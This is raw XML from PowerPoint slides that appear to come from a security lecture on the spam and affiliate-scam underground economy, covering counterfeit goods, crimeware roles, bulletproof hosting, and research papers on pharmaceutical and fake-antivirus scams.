                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C205A6B-1EF9-451E-BC69-21F8EAD6E696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="5680061"/>
            <a:ext cx="2251626" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Super high privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extremely challenging to implement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27822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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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9" end="9"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40"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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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8" dur="5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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Counterfeit Goods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Viagra, Cialis, Gucci, Rolex, and Anti-Virus?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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6174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67" name="Straight Connector 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA288E99-8C2D-4A88-999A-23A6D9C7AD29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7414562" y="632347"/>
            <a:ext cx="3021534" cy="10176"/>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163747" y="162006"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Structure of the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="739750" y="855947"/>
          <a:ext cx="10515600" cy="6101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Arrow Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3251745" y="4966385"/>
            <a:ext cx="0" cy="145411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85766" y="6180655"/>
            <a:ext cx="0" cy="2398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10438616" y="6171647"/>
            <a:ext cx="0" cy="3315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3251745" y="6421980"/>
            <a:ext cx="8325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504609" y="6162431"/>
            <a:ext cx="0" cy="2864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4504609" y="6448927"/>
            <a:ext cx="7106809" cy="677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a:xfrm>
            <a:off x="11611418" y="2126665"/>
            <a:ext cx="0" cy="43900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flipH="1">
            <a:off x="9973735" y="2126665"/>
            <a:ext cx="163768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B3DBC1-5D68-4327-9F7E-9CC4669056DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4296714" y="6174230"/>
            <a:ext cx="0" cy="49253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FDAFA2-28DA-49EC-B885-3B2BE77B64AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505400" y="6668974"/>
            <a:ext cx="27913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DD76233-8748-48BA-A5C0-85B198F15820}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1505400" y="4966385"/>
            <a:ext cx="0" cy="17085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4787FDB-0F75-4C11-ADD9-9A98A3C531E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3541057"/>
            <a:ext cx="0" cy="4927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3D054B5-2392-4175-9CD5-CDE7FF4C0A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165979" y="3548530"/>
            <a:ext cx="5996989" cy="465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48BDDD5-F446-438D-9B52-AB2568ADA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621701" y="3595111"/>
            <a:ext cx="0" cy="4386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D0F61A8-1D5D-447A-BBA7-869295DDE43F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161466" y="3595110"/>
            <a:ext cx="0" cy="4386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D536A7E7-A6E2-4715-8939-342DAD5AB441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6556798" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Rectangle: Rounded Corners 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6739DC6-B36D-489A-BCFA-643DCAEE5EAB}"/>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3908339E-1583-46AF-A390-A94A28E28DB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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rPr>
                <a:t>Zero-day Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="55" name="Group 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5FD889-3346-4CD8-A038-C5C40C956210}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9550956" y="162005"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050412" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle: Rounded Corners 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08CBF0C-03A9-4452-A839-415F0248E337}"/>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B269B01C-5C1F-4067-AA5F-8E88FF7F55BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389104" y="1411965"/>
              <a:ext cx="1875635"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Crimeware</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Development</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="59" name="Straight Connector 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA76E5D-33F4-4A5A-B745-17A391F4D76D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="53" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481636" y="1068185"/>
            <a:ext cx="0" cy="22949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1" name="Straight Connector 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31171E-46D8-4B36-8CDE-5EB642F4D13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10503171" y="1068185"/>
            <a:ext cx="0" cy="22949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2" name="Straight Connector 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B801004-FC82-43D0-BBB2-B7EA49575171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8925329" y="1297681"/>
            <a:ext cx="0" cy="30463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3" name="Straight Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94C6349-1204-483B-BE52-BD95F8D8707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7481637" y="1297681"/>
            <a:ext cx="3021534" cy="10176"/>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69" name="Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D6170F-46E2-4F33-B4E8-2772E243B7B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5033801" y="5129378"/>
            <a:ext cx="4717415" cy="1128127"/>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76" name="Group 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40894DD1-ECDF-483A-B62D-198E51C83BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3699587" y="1923564"/>
            <a:ext cx="1704394" cy="906180"/>
            <a:chOff x="6214327" y="1292169"/>
            <a:chExt cx="2050411" cy="906180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636"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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405359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Affiliate Scams, Revisited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus far, we have focused on spammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This represents the advertising portion of affiliate schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about the affiliate scammers themselves?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These schemes are complicated to host and maintain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payment processing is crucial but also challenging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Order fulfillment and customer service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22514393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Scammers in the Spotlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’re going to look at data from four papers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click Trajectories: End-to-End Analysis of the Spam Value Chain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PharmaLeaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Understanding the Business of Online Pharmaceutical Affiliate Programs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Underground Economy of Fake Antivirus Software </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Priceless: The Role of Payments in Abuse-advertised Goods </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These papers analyze the full breadth of the scamming ecosystem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infrastructure and the key role of payment processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ground-truth data about large-scale pharmaceutical scams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ground-truth data about large-scale fake anti-virus scams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11477346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008"/>
            <a:ext cx="10515600" cy="1021306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Scammin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ain’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1364776"/>
            <a:ext cx="10515600" cy="5377217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Suppose you want to setup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.canadianpharma.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What sort of hosting infrastructure do you need?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain name(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: legit registrars will take down your name if they receive complaints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some registrars are known to ignore complaints, but they charge more ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem: DNS servers are an obvious choke-point for law enforcement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Bulletproof” DNS is available on the market, but its expensive ;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Bulletproof” servers are available, but they’re expensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some services offer resilient hosting with distributed web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But obviously, it’s expensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134079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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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9" end="9"/>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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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8"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fade">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54"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5" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="5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0" dur="5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Scammin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ain’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Easy, Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4961862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
